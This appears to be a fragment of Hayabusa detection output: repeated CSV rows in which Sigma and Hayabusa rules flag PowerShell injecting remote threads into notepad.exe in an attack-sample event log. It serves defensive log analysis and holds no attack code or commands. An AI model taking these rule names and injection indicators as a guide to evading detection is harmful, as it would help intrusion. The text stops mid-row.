+2019-05-18 17:16:16.567 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.567 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.583 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.583 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.583 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.583 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.598 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.598 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.598 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.598 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.614 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.614 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.614 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.614 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.630 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.630 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.630 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.630 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.661 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.661 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.661 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.661 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.692 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.692 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.692 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.692 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.708 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.708 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.708 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.708 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.723 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.723 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.723 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.723 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.739 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.739 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.739 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.739 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.755 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.755 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.755 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.755 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.770 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.770 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.770 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.770 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.801 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.801 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.801 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.801 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.817 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.817 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.817 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.817 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.833 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.833 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.833 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.833 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.848 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.848 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.848 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.848 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.864 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.864 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.864 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.864 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.880 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.880 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.880 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.880 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.895 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.895 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.895 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.895 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.926 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.926 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.926 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.926 +00:00,IEWIN7,8,high,PrivEsc | 